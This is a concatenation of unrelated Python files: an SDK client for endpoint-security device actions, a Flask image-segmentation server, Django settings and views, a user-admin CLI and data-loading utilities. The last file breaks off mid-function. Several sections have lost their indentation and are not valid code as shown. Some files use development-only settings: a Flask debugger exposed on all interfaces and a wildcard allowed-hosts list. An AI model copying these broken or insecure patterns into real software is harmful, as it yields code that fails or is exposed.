@app.websocket('/hhagent_connect')
async def hhagent_connect(request, ws):
    """Websocket endpoint: run the consumer and producer handlers side by side.

    Each loop iteration races the two handlers; when the first completes,
    the other is cancelled and both are restarted on the next pass.
    """
    # TODO: do things here for initial connect
    while True:
        consumer_task = asyncio.ensure_future(_consumer_handler(ws))
        producer_task = asyncio.ensure_future(_producer_handler(ws))
        done, pending = await asyncio.wait(
            [consumer_task, producer_task],
            return_when=asyncio.FIRST_COMPLETED
        )
        for task in pending:
            task.cancel()
def start_server():
    """Print the startup banner and serve the agent on 0.0.0.0:1337 (blocking)."""
    print(BANNER)
    app.run('0.0.0.0', port=1337, protocol=WebSocketProtocol)
|
#!/usr/bin/env python3
# *******************************************************
# Copyright (c) VMware, Inc. 2020. All Rights Reserved.
# SPDX-License-Identifier: MIT
# *******************************************************
# *
# * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
# * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
# * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
# * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
# * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""Definition of the CBCloudAPI object, the core object for interacting with the Carbon Black Cloud SDK."""
from cbc_sdk.connection import BaseAPI
from cbc_sdk.errors import ApiError, CredentialError, ServerError
from cbc_sdk.live_response_api import LiveResponseSessionManager
from cbc_sdk.audit_remediation import Run, RunHistory
from cbc_sdk.enterprise_edr.threat_intelligence import ReportSeverity
import logging
import time
from concurrent.futures import ThreadPoolExecutor
log = logging.getLogger(__name__)
class CBCloudAPI(BaseAPI):
    """The main entry point into the CBCloudAPI.

    :param str profile: (optional) Use the credentials in the named profile when connecting to the Carbon Black server.
        Uses the profile named 'default' when not specified.

    Usage::

    >>> from cbc_sdk import CBCloudAPI
    >>> cb = CBCloudAPI(profile="production")
    """
    def __init__(self, *args, **kwargs):
        super(CBCloudAPI, self).__init__(*args, **kwargs)
        # NOTE(review): 'thread_pool_count' is popped AFTER kwargs were
        # forwarded to BaseAPI.__init__ -- BaseAPI must tolerate the extra
        # key; confirm this ordering is intentional.
        self._thread_pool_count = kwargs.pop('thread_pool_count', 1)
        self._lr_scheduler = None   # lazily built by the live_response property
        self._async_executor = None  # lazily built by _async_submit
        if not self.credentials.org_key:
            raise CredentialError("No organization key specified")
def _perform_query(self, cls, **kwargs):
if hasattr(cls, "_query_implementation"):
return cls._query_implementation(self, **kwargs)
else:
raise ApiError("All Carbon Black Cloud models must provide _query_implementation")
# ---- Async
def _async_submit(self, callable, *args, **kwargs):
"""
Submit a task to the executor, creating it if it doesn't yet exist.
Args:
callable (func): A callable to be executed as a background task.
*args (list): Arguments to be passed to the callable.
**kwargs (dict): Keyword arguments to be passed to the callable.
Returns:
Future: A future object representing the background task, which will pass along the result.
"""
if not self._async_executor:
self._async_executor = ThreadPoolExecutor(max_workers=self._thread_pool_count)
return self._async_executor.submit(callable, args, kwargs)
# ---- LiveOps
@property
def live_response(self):
if self._lr_scheduler is None:
self._lr_scheduler = LiveResponseSessionManager(self)
return self._lr_scheduler
def _request_lr_session(self, sensor_id):
return self.live_response.request_session(sensor_id)
# ---- Audit and Remediation
def audit_remediation(self, sql):
return self.select(Run).where(sql=sql)
def audit_remediation_history(self, query=None):
return self.select(RunHistory).where(query)
# ---- Notifications
def notification_listener(self, interval=60):
"""Generator to continually poll the Cb Endpoint Standard server for notifications (alerts). Note that this can only
be used with a 'SIEM' key generated in the Cb Endpoint Standard console.
"""
while True:
for notification in self.get_notifications():
yield notification
time.sleep(interval)
def get_notifications(self):
"""Retrieve queued notifications (alerts) from the Cb Endpoint Standard server. Note that this can only be used
with a 'SIEM' key generated in the Cb Endpoint Standard console.
:returns: list of dictionary objects representing the notifications, or an empty list if none available.
"""
res = self.get_object("/integrationServices/v3/notification")
return res.get("notifications", [])
# ---- Device API
def _raw_device_action(self, request):
"""
Invokes the API method for a device action.
:param dict request: The request body to be passed as JSON to the API method.
:return: The parsed JSON output from the request.
:raises ServerError: If the API method returns an HTTP error code.
"""
url = "/appservices/v6/orgs/{0}/device_actions".format(self.credentials.org_key)
resp = self.post_object(url, body=request)
if resp.status_code == 200:
return resp.json()
elif resp.status_code == 204:
return None
else:
raise ServerError(error_code=resp.status_code, message="Device action error: {0}".format(resp.content))
def _device_action(self, device_ids, action_type, options=None):
"""
Executes a device action on multiple device IDs.
:param list device_ids: The list of device IDs to execute the action on.
:param str action_type: The action type to be performed.
:param dict options: Options for the bulk device action. Default None.
"""
request = {"action_type": action_type, "device_id": device_ids}
if options:
request["options"] = options
return self._raw_device_action(request)
def _action_toggle(self, flag):
"""
Converts a boolean flag value into a "toggle" option.
:param boolean flag: The value to be converted.
:return: A dict containing the appropriate "toggle" element.
"""
if flag:
return {"toggle": "ON"}
else:
return {"toggle": "OFF"}
def device_background_scan(self, device_ids, scan):
"""
Set the background scan option for the specified devices.
:param list device_ids: List of IDs of devices to be set.
:param boolean scan: True to turn background scan on, False to turn it off.
"""
return self._device_action(device_ids, "BACKGROUND_SCAN", self._action_toggle(scan))
def device_bypass(self, device_ids, enable):
"""
Set the bypass option for the specified devices.
:param list device_ids: List of IDs of devices to be set.
:param boolean enable: True to enable bypass, False to disable it.
"""
return self._device_action(device_ids, "BYPASS", self._action_toggle(enable))
def device_delete_sensor(self, device_ids):
"""
Delete the specified sensor devices.
:param list device_ids: List of IDs of devices to be deleted.
"""
return self._device_action(device_ids, "DELETE_SENSOR")
def device_uninstall_sensor(self, device_ids):
"""
Uninstall the specified sensor devices.
:param list device_ids: List of IDs of devices to be uninstalled.
"""
return self._device_action(device_ids, "UNINSTALL_SENSOR")
def device_quarantine(self, device_ids, enable):
"""
Set the quarantine option for the specified devices.
:param list device_ids: List of IDs of devices to be set.
:param boolean enable: True to enable quarantine, False to disable it.
"""
return self._device_action(device_ids, "QUARANTINE", self._action_toggle(enable))
def device_update_policy(self, device_ids, policy_id):
"""
Set the current policy for the specified devices.
:param list device_ids: List of IDs of devices to be changed.
:param int policy_id: ID of the policy to set for the devices.
"""
return self._device_action(device_ids, "UPDATE_POLICY", {"policy_id": policy_id})
def device_update_sensor_version(self, device_ids, sensor_version):
"""
Update the sensor version for the specified devices.
:param list device_ids: List of IDs of devices to be changed.
:param dict sensor_version: New version properties for the sensor.
"""
return self._device_action(device_ids, "UPDATE_SENSOR_VERSION", {"sensor_version": sensor_version})
# ---- Alerts API
def alert_search_suggestions(self, query):
"""
Returns suggestions for keys and field values that can be used in a search.
:param query str: A search query to use.
:return: A list of search suggestions expressed as dict objects.
"""
query_params = {"suggest.q": query}
url = "/appservices/v6/orgs/{0}/alerts/search_suggestions".format(self.credentials.org_key)
output = self.get_object(url, query_params)
return output["suggestions"]
def _bulk_threat_update_status(self, threat_ids, status, remediation, comment):
"""
Update the status of alerts associated with multiple threat IDs, past and future.
:param list threat_ids: List of string threat IDs.
:param str status: The status to set for all alerts, either "OPEN" or "DISMISSED".
:param str remediation: The remediation state to set for all alerts.
:param str comment: The comment to set for all alerts.
"""
if not all(isinstance(t, str) for t in threat_ids):
raise ApiError("One or more invalid threat ID values")
request = {"state": status, "threat_id": threat_ids}
if remediation is not None:
request["remediation_state"] = remediation
if comment is not None:
request["comment"] = comment
url = "/appservices/v6/orgs/{0}/threat/workflow/_criteria".format(self.credentials.org_key)
resp = self.post_object(url, body=request)
output = resp.json()
return output["request_id"]
def bulk_threat_update(self, threat_ids, remediation=None, comment=None):
"""
Update the alert status of alerts associated with multiple threat IDs.
The alerts will be left in an OPEN state after this request.
:param threat_ids list: List of string threat IDs.
:param remediation str: The remediation state to set for all alerts.
:param comment str: The comment to set for all alerts.
:return: The request ID, which may be used to select a WorkflowStatus object.
"""
return self._bulk_threat_update_status(threat_ids, "OPEN", remediation, comment)
def bulk_threat_dismiss(self, threat_ids, remediation=None, comment=None):
    """
    Dismiss the alerts associated with multiple threat IDs.
    The alerts will be left in a DISMISSED state after this request.

    :param list threat_ids: List of string threat IDs.
    :param str remediation: The remediation state to set for all alerts.
    :param str comment: The comment to set for all alerts.
    :return: The request ID, which may be used to select a WorkflowStatus object.
    """
    # Thin wrapper: delegates to the shared helper with a fixed "DISMISSED" state.
    return self._bulk_threat_update_status(threat_ids, "DISMISSED", remediation, comment)
# ---- Enterprise EDR
def create(self, cls, data=None):
    """Create a new model instance bound to this API object.

    >>> feed = cb.create(Feed, feed_data)

    :param cls: The model class being instantiated.
    :param data: Initial data to pre-populate the model with.
    :type data: dict(str, object)
    :return: A new instance of `cls`.
    """
    instance = cls(self, initial_data=data)
    return instance
def validate_process_query(self, query):
    """Validate the given IOC query against the server.

    >>> cb.validate_query("process_name:chrome.exe")  # True

    :param str query: The query to validate.
    :return: Whether or not the query is valid.
    :rtype: bool
    """
    url = "/api/investigate/v1/orgs/{}/processes/search_validation".format(
        self.credentials.org_key
    )
    response = self.get_object(url, query_parameters={"q": query})
    return response.get("valid", False)
def convert_feed_query(self, query):
    """Convert a legacy CB Response query to a ThreatHunter query.

    :param str query: The query to convert.
    :return: The converted query string.
    :rtype: str
    """
    payload = {"query": query}
    response = self.post_object("/threathunter/feedmgr/v2/query/translate", payload)
    return response.json().get("query")
@property
def custom_severities(self):
    """Return the active :py:class:`ReportSeverity` instances.

    :rtype: list[:py:class:`ReportSeverity`]
    """
    # TODO(ww): There's probably a better place to put this.
    url = "/threathunter/watchlistmgr/v3/orgs/{}/reports/severity".format(
        self.credentials.org_key
    )
    results = self.get_object(url).get("results", [])
    return [self.create(ReportSeverity, entry) for entry in results]
def fetch_process_queries(self):
    """Retrieve the queries, active or complete, known by the ThreatHunter server.

    :return: A list of query ids.
    :rtype: list(str)
    """
    url = "/api/investigate/v1/orgs/{}/processes/search_jobs".format(
        self.credentials.org_key
    )
    return self.get_object(url).get("query_ids", [])
def process_limits(self):
    """Return a dictionary containing API limiting information.

    Example:
    >>> cb.limits()
    {u'status_code': 200, u'time_bounds': {u'upper': 1545335070095, u'lower': 1542779216139}}

    :return: A dict of limiting information.
    :rtype: dict(str, str)
    """
    endpoint = "/api/investigate/v1/orgs/{}/processes/limits".format(
        self.credentials.org_key
    )
    return self.get_object(endpoint)
|
from shooter.config import LANDSCAPE_PALM
from shooter.game_object.landscape import Landscape
class Palm(Landscape):
    """Palm tree landscape element (static scenery)."""
    def __init__(self, x, y, image=LANDSCAPE_PALM):
        # Placement and sprite setup are handled entirely by Landscape.
        super().__init__(x, y, image)
|
import torch
import numpy as np
import os
import cv2
from LapNet import LAPNet
from create_dataset import createDataset
from torch.nn import DataParallel
from collections import OrderedDict
from torch.nn.parameter import Parameter
import json
import base64
import numpy as np
from flask import Flask, request, Response
app = Flask(__name__)
# Quiet TensorFlow's native logging if TF is present (3 = errors only).
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
# Checkpoint filename expected under <root_path>/trained_model/.
ModelName = "LapNet_chkpt_better_epoch3978_GPU0_line.pth"
# ModelName = "LapNet_chkpt_better_epoch1890_GPU0_chLi_line.pth"
# Label for what the model detects; stored on the service object only.
DetectMode = "line"
# TCP port for the Flask server (a string is accepted by app.run).
Port = "9360"
class LapNet_Test:
    """Holds a LAPNet segmentation model restored from a checkpoint, ready
    for GPU inference."""
    def __init__(self, model_name, detect_mode):
        """
        :param model_name: checkpoint filename under <root_path>/trained_model/.
        :param detect_mode: detection-mode label (e.g. "line"); stored only.
        """
        # torch.cuda.set_device(args.gpu_idx)
        torch.cuda.set_device(0)
        # self.INPUT_CHANNELS = 3
        # self.OUTPUT_CHANNELS = 2
        # self.LEARNING_RATE = args.lr #1e-5
        # self.BATCH_SIZE = args.batch_size #20
        # self.NUM_EPOCHS = args.epoch #100
        # self.LOG_INTERVAL = 20
        # self.INS_CH = 32
        # self.SIZE = [args.img_size[0], args.img_size[1]] #[224, 224]
        # self.NUM_WORKERS = args.num_workers #20
        # Hard-coded hyperparameters (the commented block above shows the
        # original argparse-driven equivalents).
        self.INPUT_CHANNELS = 3
        self.OUTPUT_CHANNELS = 2
        self.LEARNING_RATE = 3e-4
        self.BATCH_SIZE = 32
        self.NUM_EPOCHS = 10000000000000
        self.LOG_INTERVAL = 20
        self.INS_CH = 32
        self.SIZE = [1024,512]  # network input size; assumed (width, height) — TODO confirm
        self.NUM_WORKERS = 32
        self.model_name = model_name
        self.detect_mode = detect_mode
        self.root_path = '../../../thirdparty/lapnet-gpu'
        self.model = LAPNet(input_ch=self.INPUT_CHANNELS, output_ch=self.OUTPUT_CHANNELS,internal_ch = 8).cuda()
        self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.LEARNING_RATE, betas=(0.9, 0.99), amsgrad=True)
        chkpt_filename = self.root_path + '/trained_model/'+ self.model_name
        if not os.path.exists(self.root_path + '/trained_model'):
            os.mkdir(self.root_path + '/trained_model')
        # Restore weights/optimizer when the checkpoint exists. NOTE:
        # self.start_epoch is only defined in this branch.
        if os.path.isfile(chkpt_filename):
            checkpoint = torch.load(chkpt_filename)
            self.start_epoch = checkpoint['epoch']
            self.optimizer.load_state_dict(checkpoint['optimizer'])
            self.model.load_state_dict(checkpoint['net'])
            # NOTE(review): this copies the freshly loaded state back onto the
            # same model via the helpers below — it appears redundant; confirm
            # before removing.
            self.load_state_dict(self.model, self.state_dict(self.model))
    def state_dict(self, model, destination=None, prefix='', keep_vars=False):
        """Recursively collect *model*'s parameters and buffers into an
        OrderedDict keyed by dotted names, unwrapping DataParallel."""
        own_state = model.module if isinstance(model, torch.nn.DataParallel) \
            else model
        if destination is None:
            destination = OrderedDict()
        for name, param in own_state._parameters.items():
            if param is not None:
                # keep_vars=False stores the raw tensor (param.data).
                destination[prefix + name] = param if keep_vars else param.data
        for name, buf in own_state._buffers.items():
            if buf is not None:
                destination[prefix + name] = buf
        for name, module in own_state._modules.items():
            if module is not None:
                # Recurse into submodules with a dotted prefix.
                self.state_dict(module, destination, prefix + name + '.', keep_vars=keep_vars)
        return destination
    def load_state_dict(self, model, state_dict, strict=True):
        """Copy the tensors in *state_dict* into *model* in place.

        :param strict: when True, raise on unexpected or missing keys.
        :raises RuntimeError: if a tensor's shape does not match the model's.
        :raises KeyError: on unexpected/missing keys when strict is True.
        """
        own_state = model.module.state_dict() if isinstance(model, torch.nn.DataParallel) \
            else model.state_dict()
        for name, param in state_dict.items():
            if name in own_state:
                if isinstance(param, Parameter):
                    # backwards compatibility for serialized parameters
                    param = param.data
                try:
                    own_state[name].copy_(param)
                except Exception:
                    raise RuntimeError('While copying the parameter named {}, '
                                       'whose dimensions in the model are {} and '
                                       'whose dimensions in the checkpoint are {}.'
                                       .format(name, own_state[name].size(), param.size()))
            elif strict:
                raise KeyError('unexpected key "{}" in state_dict'
                               .format(name))
        if strict:
            missing = set(own_state.keys()) - set(state_dict.keys())
            if len(missing) > 0:
                raise KeyError('missing keys in state_dict: "{}"'.format(missing))
# Module-level singleton: load the model once at import time and switch it
# to inference (eval) mode.
lapnet_test = LapNet_Test(ModelName, DetectMode)
lapnet_test.model.eval()
@app.route("/predict", methods=["POST"])
def predict():
    """Run LapNet segmentation on a base64-encoded image.

    Request body: JSON ``{"Image": "<base64 image bytes>"}``.
    Response: JSON ``{"OutputImage": "<base64 JPEG of the MAGMA-colored
    segmentation map>"}``.
    """
    data = request.get_data()
    data_json = json.loads(data)
    img_b64encode = bytes(data_json["Image"], encoding="utf-8")
    img_b64decode = base64.b64decode(img_b64encode)
    img_array = np.frombuffer(img_b64decode, np.uint8)
    # BUG FIX: cv2.imdecode expects an IMREAD_* flag; the original passed
    # cv2.COLOR_BGR2RGB (a color-conversion code that numerically aliases
    # IMREAD_ANYCOLOR). IMREAD_COLOR makes the intended 3-channel decode
    # explicit.
    image = cv2.imdecode(img_array, cv2.IMREAD_COLOR)
    train_dataset = createDataset("", size=lapnet_test.SIZE, image=image)
    train_dataloader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=24,
                                                   pin_memory=True, shuffle=False,
                                                   num_workers=0)
    # Take the first (and only) batch without materializing the whole loader
    # (the original built list(enumerate(...)) just to index element 0).
    img = next(iter(train_dataloader))
    # Inference only: no_grad avoids building the autograd graph.
    with torch.no_grad():
        img_tensor = img.cuda() if isinstance(img, torch.Tensor) else torch.tensor(img).cuda()
        sem_pred = lapnet_test.model(img_tensor)
    seg_map = torch.squeeze(sem_pred, 0).cpu().detach().numpy()
    # Channel 1 is assumed to hold the foreground scores — TODO confirm.
    seg_show = seg_map[1]
    # Clamp negatives to zero, stretch to 0..255, then colormap for display.
    _, seg_show2 = cv2.threshold(seg_show + 1, 0, 0, cv2.THRESH_TOZERO)
    seg_show2 = cv2.normalize(seg_show2, seg_show2, 0, 1, cv2.NORM_MINMAX)
    seg_show2 = cv2.convertScaleAbs(seg_show2, seg_show2, 255)
    result_img = cv2.applyColorMap(seg_show2, cv2.COLORMAP_MAGMA)
    output_img_array = cv2.imencode(".jpg", result_img)[1]
    # Strip the b'...' wrapper from the bytes repr to get plain base64 text.
    output_img_b64encode = str(base64.b64encode(output_img_array))[2:-1]
    image_output_json = {}
    image_output_json["OutputImage"] = output_img_b64encode
    return image_output_json
# Development entry point. NOTE(review): debug=True enables the Werkzeug
# debugger/reloader — must not be used in production.
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=Port,debug=True)
|
import dolfin as df
import numpy as np
def make_line_mesh(vertices, cells=None, close_path=False):
    '''Build a 1d (interval-cell) dolfin Mesh embedded in R^gdim via MeshEditor.

    When *cells* is None the vertices are joined consecutively as a path;
    close_path=True additionally joins the last vertex back to the first.
    '''
    assert vertices.ndim == 2

    # No connectivity supplied: derive path cells and recurse once.
    if cells is None:
        nvertices = len(vertices)
        npairs = nvertices if close_path else nvertices - 1
        cells = np.array([(i, (i + 1) % nvertices) for i in range(npairs)],
                         dtype='uintp')
        return make_line_mesh(vertices, cells)

    ncells, nvtx_per_cell = cells.shape
    assert nvtx_per_cell == 2  # interval cells only

    tdim = 1
    nvertices, gdim = vertices.shape
    assert gdim > 1  # embedded curve, not a 1d axis

    mesh = df.Mesh()
    editor = df.MeshEditor()
    editor.open(mesh, 'interval', tdim, gdim)
    editor.init_vertices(nvertices)
    editor.init_cells(ncells)
    for index, point in enumerate(vertices):
        editor.add_vertex(index, point)
    for index, connectivity in enumerate(np.asarray(cells, dtype='uintp')):
        editor.add_cell(index, connectivity)
    editor.close()
    return mesh
|
import logging
import sys
from typing import TYPE_CHECKING
from grouper import public_key
from grouper.ctl.base import CtlCommand
from grouper.ctl.util import ensure_valid_username, make_session
from grouper.models.audit_log import AuditLog
from grouper.models.user import User
from grouper.plugin.exceptions import PluginRejectedDisablingUser
from grouper.role_user import disable_role_user, enable_role_user
from grouper.usecases.convert_user_to_service_account import ConvertUserToServiceAccountUI
from grouper.user import disable_user, enable_user, get_all_users
from grouper.user_metadata import set_user_metadata
if TYPE_CHECKING:
from argparse import ArgumentParser, Namespace
from grouper.usecases.factory import UseCaseFactory
@ensure_valid_username
def user_command(args):
    # type: (Namespace) -> None
    """Handle the `user` ctl subcommands.

    Dispatches on args.subcommand: "create", "disable" and "enable" accept
    multiple usernames and return early; "set_metadata" and
    "add_public_key" operate on a single username below.
    """
    session = make_session()
    if args.subcommand == "create":
        for username in args.username:
            user = User.get(session, name=username)
            if not user:
                logging.info("{}: No such user, creating...".format(username))
                user = User.get_or_create(session, username=username, role_user=args.role_user)
                session.commit()
            else:
                logging.info("{}: Already exists. Doing nothing.".format(username))
        return
    elif args.subcommand == "disable":
        for username in args.username:
            user = User.get(session, name=username)
            if not user:
                logging.info("{}: No such user. Doing nothing.".format(username))
            elif not user.enabled:
                logging.info("{}: User already disabled. Doing nothing.".format(username))
            else:
                logging.info("{}: User found, disabling...".format(username))
                try:
                    # Role users need extra teardown beyond a plain disable.
                    if user.role_user:
                        disable_role_user(session, user)
                    else:
                        disable_user(session, user)
                    AuditLog.log(
                        session,
                        user.id,
                        "disable_user",
                        "(Administrative) User disabled via grouper-ctl",
                        on_user_id=user.id,
                    )
                    session.commit()
                except PluginRejectedDisablingUser as e:
                    # A plugin vetoed the disable; report and continue.
                    logging.error(e.message)
        return
    elif args.subcommand == "enable":
        for username in args.username:
            user = User.get(session, name=username)
            if not user:
                logging.info("{}: No such user. Doing nothing.".format(username))
            elif user.enabled:
                logging.info("{}: User not disabled. Doing nothing.".format(username))
            else:
                logging.info("{}: User found, enabling...".format(username))
                if user.role_user:
                    enable_role_user(
                        session, user, preserve_membership=args.preserve_membership, user=user
                    )
                else:
                    enable_user(session, user, user, preserve_membership=args.preserve_membership)
                AuditLog.log(
                    session,
                    user.id,
                    "enable_user",
                    "(Administrative) User enabled via grouper-ctl",
                    on_user_id=user.id,
                )
                session.commit()
        return
    # "add_public_key" and "set_metadata"
    user = User.get(session, name=args.username)
    if not user:
        logging.error("{}: No such user. Doing nothing.".format(args.username))
        return
    # User must exist at this point.
    if args.subcommand == "set_metadata":
        logging.info(
            "Setting %s metadata: %s=%s", args.username, args.metadata_key, args.metadata_value
        )
        # An empty value clears the metadata key.
        if args.metadata_value == "":
            args.metadata_value = None
        set_user_metadata(session, user.id, args.metadata_key, args.metadata_value)
        session.commit()
    elif args.subcommand == "add_public_key":
        logging.info("Adding public key for user")
        try:
            pubkey = public_key.add_public_key(session, user, args.public_key)
        except public_key.DuplicateKey:
            logging.error("Key already in use")
            return
        except public_key.PublicKeyParseError:
            logging.error("Public key appears to be invalid")
            return
        AuditLog.log(
            session,
            user.id,
            "add_public_key",
            "(Administrative) Added public key: {}".format(pubkey.fingerprint_sha256),
            on_user_id=user.id,
        )
class UserCommand(CtlCommand, ConvertUserToServiceAccountUI):
    """Commands to modify users."""

    @staticmethod
    def add_arguments(parser):
        # type: (ArgumentParser) -> None
        """Register the `user` subcommand tree and its options on *parser*."""
        parser.add_argument(
            "-a",
            "--actor",
            required=False,
            dest="actor_name",
            help=(
                "Name of the entity performing this action."
                " Must be a valid Grouper human or service account."
            ),
        )
        subparsers = parser.add_subparsers(dest="subcommand")

        key_parser = subparsers.add_parser("add_public_key", help="Add public key to user")
        key_parser.add_argument("username")
        key_parser.add_argument("public_key")

        convert_parser = subparsers.add_parser(
            "convert_to_service_account", help="Convert to service account"
        )
        convert_parser.add_argument(
            "--owner", required=True, help="Name of group to own the service account"
        )
        convert_parser.add_argument("username")

        create_parser = subparsers.add_parser("create", help="Create a new user account")
        create_parser.add_argument("username", nargs="+")
        create_parser.add_argument(
            "--role-user",
            default=False,
            action="store_true",
            help="If given, identifies user as a role user.",
        )

        disable_parser = subparsers.add_parser("disable", help="Disable a user account")
        disable_parser.add_argument("username", nargs="+")

        enable_parser = subparsers.add_parser("enable", help="(Re-)enable a user account")
        enable_parser.add_argument("username", nargs="+")
        enable_parser.add_argument(
            "--preserve-membership",
            default=False,
            action="store_true",
            help="Unless provided, scrub all group memberships when re-enabling user.",
        )

        subparsers.add_parser("list", help="List all users and their account statuses")

        metadata_parser = subparsers.add_parser(
            "set_metadata", help="Set metadata on user"
        )
        metadata_parser.add_argument("username")
        metadata_parser.add_argument("metadata_key")
        metadata_parser.add_argument("metadata_value")

    def __init__(self, usecase_factory):
        # type: (UseCaseFactory) -> None
        self.usecase_factory = usecase_factory

    def converted_user_to_service_account(self, user, owner):
        # type: (str, str) -> None
        """UI callback: conversion succeeded."""
        logging.info("converted user %s to service account owned by %s", user, owner)

    def convert_user_to_service_account_failed_permission_denied(self, user):
        # type: (str) -> None
        """UI callback: actor lacks permission; abort the process."""
        logging.critical("not permitted to convert user %s to service account", user)
        sys.exit(1)

    def convert_user_to_service_account_failed_user_is_in_groups(self, user):
        # type: (str) -> None
        """UI callback: user still belongs to groups; abort the process."""
        logging.critical("user %s cannot be converted while a member of any groups", user)
        sys.exit(1)

    def run(self, args):
        # type: (Namespace) -> None
        """Execute the selected subcommand."""
        if args.subcommand == "convert_to_service_account":
            usecase = self.usecase_factory.create_convert_user_to_service_account_usecase(
                args.actor_name, self
            )
            usecase.convert_user_to_service_account(args.username, args.owner)
        elif args.subcommand == "list":
            session = make_session()
            for user in get_all_users(session):
                user_enabled = "enabled" if user.enabled else "disabled"
                logging.info("{} has status {}".format(user.name, user_enabled))
            return
        else:
            # All remaining subcommands share the legacy handler above.
            user_command(args)
|
from catello.settings.base import *
# WARNING: "*" accepts any Host header — acceptable for local development
# only; restrict this list in production deployments.
ALLOWED_HOSTS = ["*"]
# Custom flag; presumably consumed by the logging setup in the base
# settings — confirm before renaming.
LOGLEVELDEBUG=True
# Local PostgreSQL instance; passwordless (peer/trust) authentication.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'catello_bot',
        'USER': 'bruand',
        'PASSWORD': None,
        'HOST': 'localhost',
        'PORT': 5432,
    }
}
import os
import numpy as np
import pandas as pd
# Paths to text files
ROOT_DIR = os.path.join(os.path.dirname(__file__), '..')
DATA_DIR = os.path.join(ROOT_DIR, 'data')
# Full ratings set plus its pre-split train/test partitions.
DATA_PATH = os.path.join(DATA_DIR, 'data.txt')
TRAIN_DATA_PATH = os.path.join(DATA_DIR, 'train.txt')
TEST_DATA_PATH = os.path.join(DATA_DIR, 'test.txt')
MOVIES_PATH = os.path.join(DATA_DIR, 'movies.txt')
# Output directory used by save_fig().
PLOTS_DIR = os.path.join(ROOT_DIR, 'plots')
# Text file columns
# movies.txt: id, title, then one 0/1 indicator column per genre.
MOVIES_COLUMNS = [
    'movie_id',
    'title',
    'unknown',
    'action',
    'adventure',
    'animation',
    'childrens',
    'comedy',
    'crime',
    'documentary',
    'drama',
    'fantasy',
    'film_noir',
    'horror',
    'musical',
    'mystery',
    'romance',
    'sci_fi',
    'thriller',
    'war',
    'western'
]
# data/train/test files: one (user, movie, rating) triple per line.
DATA_COLUMNS = ['user_id', 'movie_id', 'rating']
def reindex(df, columns=('user_id', 'movie_id')):
    """Return a copy of *df* with the given id columns shifted from
    1-based to 0-based indexing.

    :param df: input DataFrame; it is not modified.
    :param columns: column names to decrement where present. The mutable
        list default was replaced with a tuple to avoid the shared
        mutable-default pitfall; callers passing a list still work.
    :return: the reindexed copy.
    """
    df = df.copy()
    for col in columns:
        if col in df:
            df[col] -= 1
    return df
def load_data():
    """Load the entire (train + test) dataset as a Pandas DataFrame."""
    raw = pd.read_csv(DATA_PATH, names=DATA_COLUMNS, delimiter='\t')
    return reindex(raw)
def load_train_data():
    """Load the train dataset as a Pandas DataFrame."""
    raw = pd.read_csv(TRAIN_DATA_PATH, names=DATA_COLUMNS, delimiter='\t')
    return reindex(raw)
def load_test_data():
    """Load the test dataset as a Pandas DataFrame."""
    raw = pd.read_csv(TEST_DATA_PATH, names=DATA_COLUMNS, delimiter='\t')
    return reindex(raw)
def load_movies():
    """Load the movie info as a Pandas DataFrame."""
    raw = pd.read_csv(MOVIES_PATH, names=MOVIES_COLUMNS, delimiter='\t')
    return reindex(raw)
def add_missing_ratings(df, movie_ids, user_id=None):
    """Ensure every movie in *movie_ids* has at least one rating.

    Movies absent from *df* each receive a single neutral rating of 2.5,
    attributed to *user_id* (defaults to one past the highest user id in
    the frame).
    """
    if user_id is None:
        user_id = np.max(df.user_id) + 1
    unrated = set(movie_ids) - set(df.movie_id.values)
    filler = pd.DataFrame(
        [[user_id, movie, 2.5] for movie in unrated],
        columns=df.columns
    )
    return pd.concat((df, filler))
def save_fig(fig, name):
    """Save *fig* into the plots directory as a 300-dpi, tightly cropped image."""
    target = os.path.join(PLOTS_DIR, name)
    fig.savefig(target, dpi=300, bbox_inches='tight')
|
from rest_framework import serializers
from rest_framework.routers import DefaultRouter
from rest_framework.viewsets import ModelViewSet
from hc.api.models import Channel
class ChannelSerializer(serializers.ModelSerializer):
    """Serializes Channel model instances for the REST API."""
    class Meta:
        # model/fields drive DRF's automatic field generation.
        model = Channel
        fields = ('code', 'kind', 'value', 'user', 'created', 'checks')
class ChannelsViewSet(ModelViewSet):
    """Full CRUD endpoints for channels, newest first.

    search_fields/filter_fields enable ?search= and per-field filtering on
    kind and user — presumably the filter backends are configured globally;
    confirm in the project settings.
    """
    queryset = Channel.objects.all().order_by('-created')
    serializer_class = ChannelSerializer
    search_fields = ('kind', 'user',)
    filter_fields = ('kind', 'user',)
# Router that generates the /channels/ URL patterns for ChannelsViewSet.
channels_router = DefaultRouter()
channels_router.register(r'channels', ChannelsViewSet)
|
from django.shortcuts import (render, redirect, reverse,
get_object_or_404, HttpResponse)
from django.contrib import messages
from django.views.decorators.http import require_POST
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.utils import timezone
from .forms import SubscriptionForm
from .models import Package, Subscription, SubscriptionCount
from .contexts import subscription_cart_contents
from members.models import Member
import stripe
import json
import datetime
@require_POST
def cache_checkout_data(request):
    """Attach cart and session metadata to the Stripe PaymentIntent before
    the client confirms payment, so the payment record can be tied back to
    the user's cart."""
    try:
        intent_id = request.POST.get('client_secret').split('_secret')[0]
        stripe.api_key = settings.STRIPE_SECRET_KEY
        metadata = {
            'subscription_cart': json.dumps(request.session.get('subscription_cart', {})),
            'save_member_info': request.POST.get('save_member_info'),
            'username': request.user,
        }
        stripe.PaymentIntent.modify(intent_id, metadata=metadata)
        return HttpResponse(status=200)
    except Exception as e:
        messages.error(request, 'There was an issue processing '
                                'your payment. Please try again later.')
        return HttpResponse(content=e, status=400)
def subscribe_page(request):
    """This view renders the different subscription packages a user can buy."""
    packages = Package.objects.all()
    if request.user.is_authenticated:
        member = Member.objects.filter(user=request.user)
        if member:
            # Existing members cannot purchase a second subscription.
            messages.error(request, 'You already have a subscription.')
            return redirect(reverse('home'))
        context = {
            'packages': packages,
            'member': member,
